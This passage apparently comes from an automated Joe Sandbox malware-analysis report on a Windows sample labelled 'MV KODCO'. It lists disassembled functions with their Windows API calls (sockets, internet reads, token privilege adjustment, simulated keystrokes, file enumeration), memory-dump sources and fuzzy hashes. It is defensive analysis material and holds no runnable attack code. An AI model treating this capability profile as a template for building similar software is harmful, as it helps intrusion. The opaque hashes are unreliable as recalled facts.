                                                          • Instruction Fuzzy Hash: 8A218771900219ABDB10ABA4DC88FEEB7BEAB49300F5004A9F505E7241DBB59F85CF60
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: ERCP$VUUU$VUUU$VUUU$VUUU$h
                                                          • API String ID: 0-3703243507
                                                          • Opcode ID: 6b36b7e2b2512a7375fe2239905cbbb7053ed6b349d11285d9663e895a545f6b
                                                          • Instruction ID: 55effabff019bfe9b0f783650a845c35587502fdabfcac766601a384c5969071
                                                          • Opcode Fuzzy Hash: 6b36b7e2b2512a7375fe2239905cbbb7053ed6b349d11285d9663e895a545f6b
                                                          • Instruction Fuzzy Hash: A9927C71E0025ACBDF28CF69C8507FDBBB2BB54314F14859AD896AB380D771AD81CB91
                                                          APIs
                                                          • lstrlenW.KERNEL32(?,?,?,00000000), ref: 006213DC
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: lstrlen
                                                          • String ID: ($,2i$<2i$|
                                                          • API String ID: 1659193697-3791544006
                                                          • Opcode ID: e986136e71d0b888c54f52f819c8ab1b380fa0ad0647b0f1edd0224b6c110394
                                                          • Instruction ID: 283869e0be9376fa45ca306e86a01e7aa400cf7a7f9d94b8250f645f4277d576
                                                          • Opcode Fuzzy Hash: e986136e71d0b888c54f52f819c8ab1b380fa0ad0647b0f1edd0224b6c110394
                                                          • Instruction Fuzzy Hash: 89324575A04A159FCB28DF29D4809AAB7F1FF58310B11C46EE59ADB3A1E770E981CF40
                                                          APIs
                                                            • Part of subcall function 0063A82C: inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 0063A84E
                                                          • socket.WSOCK32(00000002,00000002,00000011,?,?,?,00000000), ref: 00639296
                                                          • WSAGetLastError.WSOCK32(00000000,00000000), ref: 006392B9
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: ErrorLastinet_addrsocket
                                                          • String ID:
                                                          • API String ID: 4170576061-0
                                                          • Opcode ID: 8e3cca5922bffe8b1eca032fd18060e8c3c7ae4764a83c7f72eede124361673b
                                                          • Instruction ID: ccaede7e498938f1ee97222ec549df2bf7fa2db941f52d44ca257c64a68b7a4b
                                                          • Opcode Fuzzy Hash: 8e3cca5922bffe8b1eca032fd18060e8c3c7ae4764a83c7f72eede124361673b
                                                          • Instruction Fuzzy Hash: DB41D570600505AFDB14AB68C846E7E7BEEEF88724F04444CFA569B3C2CAB49D018BA1
                                                          APIs
                                                          • FindFirstFileW.KERNEL32(?,?), ref: 0062EB8A
                                                          • _wcscmp.LIBCMT ref: 0062EBBA
                                                          • _wcscmp.LIBCMT ref: 0062EBCF
                                                          • FindNextFileW.KERNEL32(00000000,?), ref: 0062EBE0
                                                          • FindClose.KERNEL32(00000000,00000001,00000000), ref: 0062EC0E
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: Find$File_wcscmp$CloseFirstNext
                                                          • String ID:
                                                          • API String ID: 2387731787-0
                                                          • Opcode ID: 42f30b8b8f76aa7882186adc61f447e7a2782c8079cd587dc8d2d939a4cd210e
                                                          • Instruction ID: f816a5d8da30ed06f7e5e193ecdf005967c2bd42712ca70936846fae4b9cd5c9
                                                          • Opcode Fuzzy Hash: 42f30b8b8f76aa7882186adc61f447e7a2782c8079cd587dc8d2d939a4cd210e
                                                          • Instruction Fuzzy Hash: 0E41C3757007029FC708DF68D490AA9B7E5FF49320F10456DFA6A8B3A1DB72A940CF51
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                          • String ID:
                                                          • API String ID: 292994002-0
                                                          • Opcode ID: 77db5647f250c3fcafa3c822466b50039f62ae6ebe55457ef5e627074584e295
                                                          • Instruction ID: 709f6bcd24c641c34054de11dbb9fc5add413c8965ed1ddbbe00af2940fe8b3c
                                                          • Opcode Fuzzy Hash: 77db5647f250c3fcafa3c822466b50039f62ae6ebe55457ef5e627074584e295
                                                          • Instruction Fuzzy Hash: CB11B2317006126FE7216F26DC44E6F7B9EEF84760F05142AF849D7281CF709D0286A5
                                                          APIs
                                                          • LoadLibraryA.KERNEL32(kernel32.dll,?,005FE014,74DF0AE0,005FDEF1,0067DC38,?,?), ref: 005FE02C
                                                          • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 005FE03E
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: AddressLibraryLoadProc
                                                          • String ID: GetNativeSystemInfo$kernel32.dll
                                                          • API String ID: 2574300362-192647395
                                                          • Opcode ID: 5ad0baac2b0bcbcbe7ddb2ee3533e794d54d2dabb27faedf49789f6c55b64134
                                                          • Instruction ID: 66b7b6ad615add8a553c8fc42a9d43833d05457ac2c2d7f6eaba932e7b4e74bf
                                                          • Opcode Fuzzy Hash: 5ad0baac2b0bcbcbe7ddb2ee3533e794d54d2dabb27faedf49789f6c55b64134
                                                          • Instruction Fuzzy Hash: 93D0A770901713EFCB314F61EC4D622BADEBB01300F194419E481D2560DFF8C8808650
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: Exception@8Throwstd::exception::exception
                                                          • String ID: @$ j$ j$ j
                                                          • API String ID: 3728558374-1404925065
                                                          • Opcode ID: b7b7294d6888fe5bcd6ef797a751e6e48610e81cc2feb4548aea9ec784bddcf0
                                                          • Instruction ID: d215638952543b75cc932bc7cd5b1351d01b09df8cde81d6313973e34d29652f
                                                          • Opcode Fuzzy Hash: b7b7294d6888fe5bcd6ef797a751e6e48610e81cc2feb4548aea9ec784bddcf0
                                                          • Instruction Fuzzy Hash: 7F72BD74E042099FDB14DF94C485ABEBBB6FF48340F14806AEE05AB391D739AE45CB91
                                                          APIs
                                                            • Part of subcall function 005FB34E: GetWindowLongW.USER32(?,000000EB), ref: 005FB35F
                                                          • DefDlgProcW.USER32(?,?,?,?,?), ref: 005FB22F
                                                            • Part of subcall function 005FB55D: DefDlgProcW.USER32(?,00000020,?,00000000), ref: 005FB5A5
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: Proc$LongWindow
                                                          • String ID:
                                                          • API String ID: 2749884682-0
                                                          • Opcode ID: 74269204baff3987b953d9163915332a0e7fc0668dd38d7be4b659af177cdfc4
                                                          • Instruction ID: 652f715aa999be49318e2f964151a251debe95cf7539db683ad5513baadb82b5
                                                          • Opcode Fuzzy Hash: 74269204baff3987b953d9163915332a0e7fc0668dd38d7be4b659af177cdfc4
                                                          • Instruction Fuzzy Hash: EBA1146411410DFAFB286F2ADC88DBF2D5EFB86345F14491DFA02D6292DB1E9E019273
                                                          APIs
                                                          • InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,006343BF,00000000), ref: 00634FA6
                                                          • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00634FD2
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: Internet$AvailableDataFileQueryRead
                                                          • String ID:
                                                          • API String ID: 599397726-0
                                                          • Opcode ID: 2bae86ebd2d400d6e6c0af9f211a450702d45857dfd62a032321e7690f89ecfc
                                                          • Instruction ID: 866dbb47083cec4d10d30d3472a9c62f17e785e92d32261b88a27f106a484683
                                                          • Opcode Fuzzy Hash: 2bae86ebd2d400d6e6c0af9f211a450702d45857dfd62a032321e7690f89ecfc
                                                          • Instruction Fuzzy Hash: 8B41E971604609BFEB149E84CC85EFFB7BEEB80754F14402EF20667281EB71AE4196D4
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: _memmove
                                                          • String ID: \Qi
                                                          • API String ID: 4104443479-220838703
                                                          • Opcode ID: 9be71ac17998afbe30c6a5872071c9ac5c7fd7333a7eee6e8c748a81e95cc9d7
                                                          • Instruction ID: d35c9084ef756026ba7ce088be850273cabb27a17d5ab3c012def67aa8322558
                                                          • Opcode Fuzzy Hash: 9be71ac17998afbe30c6a5872071c9ac5c7fd7333a7eee6e8c748a81e95cc9d7
                                                          • Instruction Fuzzy Hash: 46A26B70D04259CFDB28CF59C8806ADBBB2FF48314F2585A9D899AB391D7309E81DF90
                                                          APIs
                                                          • SetErrorMode.KERNEL32(00000001), ref: 0062E20D
                                                          • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 0062E267
                                                          • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 0062E2B4
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: ErrorMode$DiskFreeSpace
                                                          • String ID:
                                                          • API String ID: 1682464887-0
                                                          • Opcode ID: f7930b557914a9856b0bab7386188bdd41783550a88052d2185ca3601091446c
                                                          • Instruction ID: b3f384738870db1dea124f9cdd1de7e4569407fdc2ba678569c09ef9fc300b53
                                                          • Opcode Fuzzy Hash: f7930b557914a9856b0bab7386188bdd41783550a88052d2185ca3601091446c
                                                          • Instruction Fuzzy Hash: 72216D75A00618EFCB00EFA5D884AADFBB9FF89310F0484AAE945AB351DB719905CF50
                                                          APIs
                                                            • Part of subcall function 005FF4EA: std::exception::exception.LIBCMT ref: 005FF51E
                                                            • Part of subcall function 005FF4EA: __CxxThrowException@8.LIBCMT ref: 005FF533
                                                          • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0061B180
                                                          • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0061B1AD
                                                          • GetLastError.KERNEL32 ref: 0061B1BA
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                                          • String ID:
                                                          • API String ID: 1922334811-0
                                                          • Opcode ID: 9b0204abe0da6958c4ac733c9ff0d1a37a00af8829f0378f612706b3b6452b14
                                                          • Instruction ID: 15f9a393105b959688eba21f01b064047c13b035878d7c26a652a0e2d5027836
                                                          • Opcode Fuzzy Hash: 9b0204abe0da6958c4ac733c9ff0d1a37a00af8829f0378f612706b3b6452b14
                                                          • Instruction Fuzzy Hash: 9E11BFB1900205BFE7189F64DC8ADABBBAEFF44310B25852EE45693250DBB0FC418B60
                                                          APIs
                                                          • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00626623
                                                          • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 00626664
                                                          • CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 0062666F
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: CloseControlCreateDeviceFileHandle
                                                          • String ID:
                                                          • API String ID: 33631002-0
                                                          • Opcode ID: bd24b732bbb5398491742ea7822a7f314830209ea93d7e59991dde417020842c
                                                          • Instruction ID: a006a99faad3ed876eb1e92361921ab04827e792e2e19ca9cfe55ac097d28d6e
                                                          • Opcode Fuzzy Hash: bd24b732bbb5398491742ea7822a7f314830209ea93d7e59991dde417020842c
                                                          • Instruction Fuzzy Hash: A9111E71E01228BFDB108FA5EC45BEEBBBDEB49B50F104156F900E6290D7B05E058BA5
                                                          APIs
                                                          • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00627223
                                                          • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 0062723A
                                                          • FreeSid.ADVAPI32(?), ref: 0062724A
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: AllocateCheckFreeInitializeMembershipToken
                                                          • String ID:
                                                          • API String ID: 3429775523-0
                                                          • Opcode ID: 488fea29599570496f2c7532bc652ab979cac0b8828b58d845d16da45c8dc271
                                                          • Instruction ID: 7c7ff6c07ffc698ecf60875abc4da7b31170d63ec92ffbc633f703f8346fae65
                                                          • Opcode Fuzzy Hash: 488fea29599570496f2c7532bc652ab979cac0b8828b58d845d16da45c8dc271
                                                          • Instruction Fuzzy Hash: A5F01776E04209FFDF04DFE5DD99EEEBBB9EF08201F105869E602E2191E2709A448B10
                                                          APIs
                                                          • FindFirstFileW.KERNEL32(?,?), ref: 0062F599
                                                          • FindClose.KERNEL32(00000000), ref: 0062F5C9
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: Find$CloseFileFirst
                                                          • String ID:
                                                          • API String ID: 2295610775-0
                                                          • Opcode ID: adf2ca6a34f05512febb7ebc18b1f4e6d88a08490ee6db09f73da1a431f9718c
                                                          • Instruction ID: d5546574eb17a15acc4ac187225cd5d8e69409354b21f31ecdab353c89024e9d
                                                          • Opcode Fuzzy Hash: adf2ca6a34f05512febb7ebc18b1f4e6d88a08490ee6db09f73da1a431f9718c
                                                          • Instruction Fuzzy Hash: C211A1716006059FD710EF29D849A2EF7E9FF99324F00892EF9A5D7291CB74AD018F81
                                                          APIs
                                                          • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,0063BE6A,?,?,00000000,?), ref: 0062CEA7
                                                          • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,0063BE6A,?,?,00000000,?), ref: 0062CEB9
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: ErrorFormatLastMessage
                                                          • String ID:
                                                          • API String ID: 3479602957-0
                                                          • Opcode ID: 99ff096e3bc00d3ec3f06f3eb21d37ef5b89cec0d1bd44e93d7dacbfd193a6c7
                                                          • Instruction ID: 3598fdfe912b79740664a88daa89c2bcc7252f469a827ae8a12319ab45c2a997
                                                          • Opcode Fuzzy Hash: 99ff096e3bc00d3ec3f06f3eb21d37ef5b89cec0d1bd44e93d7dacbfd193a6c7
                                                          • Instruction Fuzzy Hash: 74F08C31500329BBEB20ABA5DC49FEA776EBF093A1F008165F959D6181D670AA40CBA0
                                                          APIs
                                                          • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 00624153
                                                          • keybd_event.USER32(?,75C0C0D0,?,00000000), ref: 00624166
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: InputSendkeybd_event
                                                          • String ID:
                                                          • API String ID: 3536248340-0
                                                          • Opcode ID: 40b9e581e64a715560f815f9bc535a658515f7c260bf0b997342e4777e82785f
                                                          • Instruction ID: c75b6350782c1fa5eda177b4b90021bd9839b7515f8deb5887f4e404f8975c5e
                                                          • Opcode Fuzzy Hash: 40b9e581e64a715560f815f9bc535a658515f7c260bf0b997342e4777e82785f
                                                          • Instruction Fuzzy Hash: 20F06D7090024DAFDB058FA0C809BBE7BB1EF04305F00800AF96696191D7B98612DFA4
                                                          APIs
                                                          • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,0061ACC0), ref: 0061AB99
                                                          • CloseHandle.KERNEL32(?,?,0061ACC0), ref: 0061ABAB
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: AdjustCloseHandlePrivilegesToken
                                                          • String ID:
                                                          • API String ID: 81990902-0
                                                          • Opcode ID: ff8a60b23b2934744d3633b2cab600d2310e83e4481a2c93cbb7fc2eac45b0cc
                                                          • Instruction ID: 35b2e779fec64c1a61a1b4b8ed25732e3c13ffb73209e798dd1e3ad86a4beda7
                                                          • Opcode Fuzzy Hash: ff8a60b23b2934744d3633b2cab600d2310e83e4481a2c93cbb7fc2eac45b0cc
